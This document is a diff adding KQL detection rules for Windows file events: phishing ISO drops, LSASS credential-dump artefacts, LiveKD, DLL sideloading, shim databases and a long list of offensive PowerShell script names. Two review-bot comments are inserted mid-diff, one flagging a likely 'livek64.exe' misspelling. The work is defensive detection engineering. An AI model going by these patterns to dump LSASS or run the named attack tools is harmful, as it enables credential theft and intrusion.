+// Description: Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Potential FP by sysadmin opening a zip file containing a legitimate ISO file
+
+DeviceFileEvents
+| where ((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".zip\\") and FolderPath endswith ".iso") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\" and FolderPath endswith ".iso")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/iso_or_image_mount_indicator_in_recent_files.kql b/KQL/rules/windows/file/file_event/iso_or_image_mount_indicator_in_recent_files.kql
new file mode 100644
index 00000000..d2a1fb30
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/iso_or_image_mount_indicator_in_recent_files.kql
@@ -0,0 +1,13 @@
+// Title: ISO or Image Mount Indicator in Recent Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-11
+// Level: medium
+// Description: Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.
+// This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Cases in which a user mounts an image file for legitimate reasons
+
+DeviceFileEvents
+| where FolderPath contains "\\Microsoft\\Windows\\Recent\\" and (FolderPath endswith ".iso.lnk" or FolderPath endswith ".img.lnk" or FolderPath endswith ".vhd.lnk" or FolderPath endswith ".vhdx.lnk")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/legitimate_application_dropped_archive.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_archive.kql
new file mode 100644
index 00000000..5f722cba
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/legitimate_application_dropped_archive.kql
@@ -0,0 +1,10 @@
+// Title: Legitimate Application Dropped Archive
+// Author: frack113, Florian Roth
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write an archive to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\finger.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\hh.exe") and (FolderPath endswith ".zip" or FolderPath endswith ".rar" or FolderPath endswith ".7z" or FolderPath endswith ".diagcab" or FolderPath endswith ".appx")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/legitimate_application_dropped_executable.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_executable.kql
new file mode 100644
index 00000000..6f51b276
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/legitimate_application_dropped_executable.kql
@@ -0,0 +1,10 @@
+// Title: Legitimate Application Dropped Executable
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write executables to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".ocx")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/legitimate_application_dropped_script.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_script.kql
new file mode 100644
index 00000000..3403e948
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/legitimate_application_dropped_script.kql
@@ -0,0 +1,10 @@
+// Title: Legitimate Application Dropped Script
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write scripts to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".vbs" or FolderPath endswith ".scf" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/livekd_driver_creation.kql b/KQL/rules/windows/file/file_event/livekd_driver_creation.kql
new file mode 100644
index 00000000..50f9001f
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/livekd_driver_creation.kql
@@ -0,0 +1,12 @@
+// Title: LiveKD Driver Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: medium
+// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - Legitimate usage of LiveKD for debugging purposes will also trigger this
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/livekd_driver_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/livekd_driver_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..0444f8ca
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/livekd_driver_creation_by_uncommon_process.kql
@@ -0,0 +1,12 @@
+// Title: LiveKD Driver Creation By Uncommon Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/livekd_kernel_memory_dump_file_created.kql b/KQL/rules/windows/file/file_event/livekd_kernel_memory_dump_file_created.kql
new file mode 100644
index 00000000..e06764b1
--- /dev/null
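Review bot: The second image name in both LiveKD rules on this line, `InitiatingProcessFolderPath endswith "\\livek64.exe"`, does not match the 64-bit Sysinternals binary, which ships as `livekd64.exe`; as written, `LiveKD Driver Creation` never matches the 64-bit tool, and `LiveKD Driver Creation By Uncommon Process` treats every legitimate 64-bit run as an uncommon process, which inverts the intent of its `not(...)` clause. I cannot tell from the hunk whether the spelling was inherited from the upstream Sigma rule or lost in conversion; if it is upstream, the fix belongs there and the output should be regenerated rather than hand-edited. Either way the term should read `InitiatingProcessFolderPath endswith "\\livekd64.exe"` in both files. A conversion-time check that image names shared between paired rules agree with each other would not catch this, so a small allow-list of known binary names for hand review is the practical safeguard.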
+++ b/KQL/rules/windows/file/file_event/livekd_kernel_memory_dump_file_created.kql
@@ -0,0 +1,12 @@
+// Title: LiveKD Kernel Memory Dump File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\livekd.dmp"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/lsass_process_dump_artefact_in_crashdumps_folder.kql b/KQL/rules/windows/file/file_event/lsass_process_dump_artefact_in_crashdumps_folder.kql
new file mode 100644
index 00000000..468deece
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/lsass_process_dump_artefact_in_crashdumps_folder.kql
@@ -0,0 +1,12 @@
+// Title: LSASS Process Dump Artefact In CrashDumps Folder
+// Author: @pbssubhash
+// Date: 2022-12-08
+// Level: high
+// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Rare legitimate dump of the process by the operating system due to a crash of lsass
+
+DeviceFileEvents
+| where FolderPath contains "lsass.exe." and FolderPath endswith ".dmp" and FolderPath startswith "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/lsass_process_memory_dump_creation_via_taskmgr_exe.kql b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
new file mode 100644
index 00000000..8c2cf94b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
@@ -0,0 +1,12 @@
+// Title: LSASS Process Memory Dump Creation Via Taskmgr.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-10-19
+// Level: high
+// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Rare case of troubleshooting by an administrator or support that has to be investigated regardless
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\taskmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\taskmgr.exe") and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains "\\lsass" and FolderPath contains ".DMP")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/lsass_process_memory_dump_files.kql b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_files.kql
new file mode 100644
index 00000000..04e5d0d0
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_files.kql
@@ -0,0 +1,10 @@
+// Title: LSASS Process Memory Dump Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-15
+// Level: high
+// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Andrew.dmp" or FolderPath endswith "\\Coredump.dmp" or FolderPath endswith "\\lsass.dmp" or FolderPath endswith "\\lsass.rar" or FolderPath endswith "\\lsass.zip" or FolderPath endswith "\\NotLSASS.zip" or FolderPath endswith "\\PPLBlade.dmp" or FolderPath endswith "\\rustive.dmp") or (FolderPath contains "\\lsass_2" or FolderPath contains "\\lsassdmp" or FolderPath contains "\\lsassdump") or (FolderPath contains "\\lsass" and FolderPath contains ".dmp") or (FolderPath contains "SQLDmpr" and FolderPath endswith ".mdmp") or ((FolderPath contains "\\nanodump" or FolderPath contains "\\proc_") and FolderPath endswith ".dmp")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql b/KQL/rules/windows/file/file_event/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
new file mode 100644
index 00000000..1072f8df
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
@@ -0,0 +1,11 @@
+// Title: Malicious DLL File Dropped in the Teams or OneDrive Folder
+// Author: frack113
+// Date: 2022-08-12
+// Level: high
+// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
+// Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
+| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql b/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql
new file mode 100644
index 00000000..4b9046be
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql
@@ -0,0 +1,10 @@
+// Title: Malicious PowerShell Scripts - FileCreation
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
+// Date: 2018-04-07
+// Level: high
+// Description: Detects the creation of known offensive powershell scripts used for exploitation
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\BadSuccessor.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath
endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith 
"\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSExfiltrator.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith 
"\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerDPAPI.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath 
endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or 
FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\Veeam-Get-Creds.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/new_custom_shim_database_created.kql b/KQL/rules/windows/file/file_event/new_custom_shim_database_created.kql
new file mode 100644
index 00000000..b6c4d886
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/new_custom_shim_database_created.kql
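Review bot: The `where` clause of `malicious_powershell_scripts_filecreation.kql` is one unbroken line of roughly 250 `FolderPath endswith "\\<name>"` terms joined by `or`, which makes a dropped, duplicated or mistyped entry practically impossible to spot in review; the same single-line shape appears in every hunk on this page, but this rule is where it hurts most. For long name lists the converter could emit a `let` holding a `dynamic([...])` array of file names and compare the file-name component once, e.g. `| where tostring(parse_path(FolderPath).Filename) in~ (ScriptNames) or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1")`, with one name per line in the array. I believe this is presentation-only for terms of the form `endswith "\\X"`, since on a backslash-separated path that is an exact case-insensitive match of the last segment, but the equivalence should be confirmed against a few sample `FolderPath` values before the converter adopts it.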
@@ -0,0 +1,13 @@
+// Title: New Custom Shim Database Created
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-29
+// Level: medium
+// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
+// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+// False Positives:
+// - Legitimate custom SHIM installations will also trigger this rule
+
+DeviceFileEvents
+| where FolderPath contains ":\\Windows\\apppatch\\Custom\\" or FolderPath contains ":\\Windows\\apppatch\\CustomSDB\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/new_outlook_macro_created.kql b/KQL/rules/windows/file/file_event/new_outlook_macro_created.kql
new file mode 100644
index 00000000..7c153c5a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/new_outlook_macro_created.kql
@@ -0,0 +1,12 @@
+// Title: New Outlook Macro Created
+// Author: @ScoubiMtl
+// Date: 2021-04-05
+// Level: medium
+// Description: Detects the creation of a macro file for Outlook.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+// False Positives:
